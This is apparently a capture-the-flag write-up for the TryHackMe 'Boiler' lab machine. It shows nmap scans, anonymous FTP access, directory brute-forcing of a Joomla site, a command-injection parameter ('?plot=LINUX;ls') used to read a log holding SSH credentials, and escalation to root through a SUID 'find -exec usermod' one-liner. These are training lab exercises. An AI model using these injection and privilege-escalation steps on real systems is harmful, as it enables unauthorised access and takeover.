# TryHackMe-Boiler CTF ## NMAP ``` Host is up (0.15s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.14.3.143 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 10000/tcp open http MiniServ 1.930 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). 55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA) | 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA) |_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service Info: OS: Unix Service detection performed. Please report any incorrect results at https ``` ## PORT 21 (FTP) So `anonymous` login is allowed on ftp so , ``` root@kali:~/TryHackMe/Medium/BoilerCTF# ftp 10.10.214.74 Connected to 10.10.214.74. 220 (vsFTPd 3.0.3) Name (10.10.214.74:root): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 . drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .. -rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt 226 Directory send OK. ftp> get .info.txt local: .info.txt remote: .info.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .info.txt (74 bytes). 226 Transfer complete. 74 bytes received in 0.00 secs (587.5254 kB/s) ftp> ``` We find a hidden file named `info.txt` This is the content of the file ``` hfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl! ``` Well this is a rabbit hole but so lets enumerate other ports . ## PORT 80 (HTTP) We get a deafult apache web page But it's good to always view the source page and since nmap showed us that there is `robots.txt` so lets look for it There wasn't anything useful in the source code of web page. Running gobuster we found some directories ``` root@kali:~/TryHackMe/Medium/BoilerCTF# gobuster dir -u http://10.10.214.74/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.214.74/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/08 23:32:44 Starting gobuster =============================================================== /manual (Status: 301) /joomla (Status: 301) ``` I ran gobuster on `/joomla` ``` root@kali:~/TryHackMe/Medium/BoilerCTF# gobuster dir -u http://10.10.214.74/joomla -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.214.74/joomla [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/08 23:35:14 Starting gobuster =============================================================== /images (Status: 301) /media (Status: 301) /templates (Status: 301) /modules (Status: 301) /tests (Status: 301) /bin (Status: 301) /plugins (Status: 301) /includes (Status: 301) /language (Status: 301) /components (Status: 301) /cache (Status: 301) /libraries (Status: 301) /installation (Status: 301) /build (Status: 301) /tmp (Status: 301) /layouts (Status: 301) /administrator (Status: 301) ``` I kept this brute force ruuning in the background and focused on enumurating other stuff ,`/administrator` presented us a login page ## PORT 10000 (HTTPS) There is a login page by the name of `webmin` but by answering the question on the room it doesn't seen that we ## Coming back to PORT 80 I saw that my gobuster reutrned some more directories ``` /cli (Status: 301) /_files (Status: 301) ``` `/cli` was empty but `/_files` was interesting This time I used `ciphey` if you want to install this https://github.com/Ciphey/Ciphey , and this was nothing but a rabbithole again :D ``` root@kali:~/TryHackMe/Medium/BoilerCTF# ciphey -t VjJodmNITnBaU0JrWVdsemVRbz0K Result 'Whopsie daisy\n' (y/N): y Format used: base64 utf8 base64 utf8 Final result: "Whopsie daisy" ``` I again run directory bruteforcing through `big.txt` ``` ============================================================= Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.214.74/joomla [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/09 00:37:20 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htaccess (Status: 403) /_archive (Status: 301) /_database (Status: 301) /_files (Status: 301) /_test (Status: 301) /administrator (Status: 301) /bin (Status: 301) /build (Status: 301) /cache (Status: 301) /cli (Status: 301) /components (Status: 301) /images (Status: 301) /includes (Status: 301) /language (Status: 301) /layouts (Status: 301) /libraries (Status: 301) /media (Status: 301) /modules (Status: 301) /plugins (Status: 301) /robots.txt (Status: 200) ``` And this time found archive,test,files so lets visit that On this page run commands like this `?plot=LINUX;ls` this will show the files in that directory and we can read `log.txt` From that file we can find ssh credentials ``` basterd:superduperp@$$ ``` ## PORT 55007 (SSH) On viewing `backup.sh` we can find `stoner`'s password `superduperp@$$no1knows` Checking for SUID we found ``` stoner@Vulnerable:/home/basterd$ find / -perm /4000 2>/dev/null /bin/su /bin/fusermount /bin/umount /bin/mount /bin/ping6 /bin/ping /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/apache2/suexec-custom /usr/lib/apache2/suexec-pristine /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/bin/newgidmap /usr/bin/find /usr/bin/at /usr/bin/chsh /usr/bin/chfn /usr/bin/passwd /usr/bin/newgrp /usr/bin/sudo /usr/bin/pkexec /usr/bin/gpasswd /usr/bin/newuidmap ``` `find` can be used to privesc so, first I tried to give `/bin/bash` SUID but it failed then I put `stoner` in sudoers and then it got executed then switched to `stoner` again and then we can execute `bash` as `root` ``` stoner@Vulnerable:/home/basterd$ find . -exec chmod+s /bin/bash find: missing argument to `-exec' stoner@Vulnerable:/home/basterd$ find . -exec usermod -aG sudo stoner \; stoner@Vulnerable:/home/basterd$ sudo bash [sudo] password for stoner: Sorry, try again. [sudo] password for stoner: Sorry, user stoner is not allowed to execute '/bin/bash' as root on Vulnerable. stoner@Vulnerable:/home/basterd$ whoami stoner stoner@Vulnerable:/home/basterd$ sudo -l User stoner may run the following commands on Vulnerable: (root) NOPASSWD: /NotThisTime/MessinWithYa stoner@Vulnerable:/home/basterd$ su stoner Password: To run a command as administrator (user "root"), use "sudo ". See "man sudo_root" for details. stoner@Vulnerable:/home/basterd$ sudo bash [sudo] password for stoner: root@Vulnerable:/home/basterd# ```